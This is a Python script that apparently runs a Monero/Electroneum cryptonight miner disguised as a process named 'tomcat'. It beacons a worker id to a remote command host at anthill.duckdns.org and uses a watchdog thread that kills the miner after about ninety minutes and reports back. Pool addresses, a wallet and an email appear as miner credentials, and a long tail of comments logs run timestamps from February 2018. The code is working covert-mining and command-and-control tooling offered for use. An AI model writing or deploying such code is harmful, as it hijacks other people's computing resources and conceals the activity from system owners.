import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:08:07.510066
#2018-02-17 16:54:03.549171
#2018-02-17 18:41:07.390456
#2018-02-17 20:29:06.673026
#2018-02-17 22:16:04.122034
#2018-02-18 00:00:03.550222
#2018-02-18 01:51:01.418424
#2018-02-18 03:38:06.031706
#2018-02-18 05:25:04.113066
#2018-02-18 07:17:06.517489
#2018-02-18 09:04:05.559393
#2018-02-18 10:51:06.594402
#2018-02-18 12:37:01.959148
#2018-02-18 14:23:05.265568
#2018-02-18 16:14:05.276443
#2018-02-18 18:03:03.504543
#2018-02-18 19:50:07.868038
#2018-02-18 21:36:08.063714
#2018-02-18 23:24:01.944676
#2018-02-19 01:10:07.050785
#2018-02-19 02:56:06.631663
#2018-02-19 04:43:01.998737
#2018-02-19 06:27:05.179057
#2018-02-19 08:17:06.120604
#2018-02-19 10:06:07.954147
#2018-02-19 11:55:08.067926
#2018-02-19 13:42:01.470566
#2018-02-19 15:32:07.304065
#2018-02-19 17:20:10.063763
#2018-02-19 19:09:04.809741
#2018-02-19 20:56:05.141350
#2018-02-19 22:44:05.630341
#2018-02-20 00:28:02.144962
#2018-02-20 02:15:08.352138
#2018-02-20 04:05:06.954671
#2018-02-20 05:48:01.281658
#2018-02-20 07:33:07.757258
#2018-02-20 09:18:05.787009
#2018-02-20 11:02:07.333647
#2018-02-20 12:49:01.945232
#2018-02-20 14:34:08.194503
#2018-02-20 16:19:06.357255
#2018-02-20 18:06:09.412790
#2018-02-20 19:58:02.224337
#2018-02-20 21:45:10.305636
#2018-02-20 23:27:02.208027
#2018-02-21 01:11:03.676228
#2018-02-21 02:57:05.557759
#2018-02-21 04:45:08.048038
#2018-02-21 06:30:09.905794
#2018-02-21 08:15:08.397672
#2018-02-21 10:03:05.846603
#2018-02-21 11:50:18.746361
#2018-02-21 14:29:05.790659
#2018-02-21 16:14:01.952585
#2018-02-21 18:05:10.108249
#2018-02-21 19:53:07.323846
#2018-02-21 21:40:07.726488
#2018-02-21 23:27:05.752323
#2018-02-22 01:15:04.108608
#2018-02-22 03:06:04.531611
#2018-02-22 04:50:08.992981
#2018-02-22 06:37:04.343095
#2018-02-22 08:25:01.720017
#2018-02-22 10:12:04.598601
#2018-02-22 11:56:08.621783
#2018-02-22 13:43:01.673179
#2018-02-22 15:30:01.811857
#2018-02-22 17:16:08.139472
#2018-02-22 19:02:05.128816
#2018-02-22 20:52:06.371849
#2018-02-22 22:37:04.214368
#2018-02-23 00:24:03.595740
#2018-02-23 02:12:01.423012
#2018-02-23 04:01:07.330698
#2018-02-23 05:52:05.182010
#2018-02-23 07:39:05.581838
#2018-02-23 09:42:06.237962
#2018-02-23 11:45:08.197540
#2018-02-23 13:34:04.036493
#2018-02-23 15:21:07.727487
#2018-02-23 17:09:10.101055
#2018-02-23 18:55:12.758283
#2018-02-23 20:42:01.679864
#2018-02-23 22:28:07.443682
#2018-02-24 00:14:04.899136
#2018-02-24 02:06:06.975345
#2018-02-24 03:56:06.437996
#2018-02-24 05:43:09.009341
#2018-02-24 07:36:06.278531
#2018-02-24 09:22:03.357557
#2018-02-24 11:15:07.971806
#2018-02-24 13:04:07.154772
#2018-02-24 14:54:07.233350
#2018-02-24 16:45:05.867978
#2018-02-24 18:33:02.175500
#2018-02-24 20:20:01.495152
#2018-02-24 22:14:08.220112
#2018-02-25 01:23:04.162783
#2018-02-25 05:28:03.391540
#2018-02-25 11:35:07.982136